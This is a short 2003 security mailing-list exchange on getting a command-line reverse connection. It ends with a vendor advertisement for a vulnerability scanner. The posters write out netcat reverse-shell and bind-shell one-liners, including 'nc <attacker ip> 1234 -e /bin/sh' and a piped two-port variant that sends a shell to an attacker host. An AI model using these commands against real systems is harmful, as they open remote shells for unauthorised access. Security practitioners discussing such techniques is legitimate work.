The second command (pushing the shell), can be better written as: nc <attacker ip> 1234 -e /bin/sh
(This works on both Linux/Windows environments with the current netcat versions, probably with older versions as well) This saves you the trouble of connecting stdin and stdout to two seperate ports and gives you a shell as you expect it!.. Paul Bakker -----Oorspronkelijk bericht----- Van: Steven Gill [mailto:[EMAIL PROTECTED] Verzonden: maandag 17 maart 2003 4:27 Aan: [EMAIL PROTECTED]; [EMAIL PROTECTED] Onderwerp: RE: command-line reverse connection tunnel? Yes, you can use netcat to send a shell back, but it is a pain to use it for port redirection. E.G. for a shell you can: nc -l -p <port> -e /bin/sh or nc <attacker ip> 1234 | /bin/sh | nc <attacker ip> 1235 and have stdin and stdout connected to the above ports respectively. But we want to use more robust services other than shell, such as getting GUI on Windows via terminal services or other more complex protocols. ---------------------------------------------------------------------------- Did you know that you have VNC running on your network? Your hacker does. Plug your security holes now! Download a free 15-day trial of VAM: http://www2.stillsecure.com/download/sf_vuln_list.html
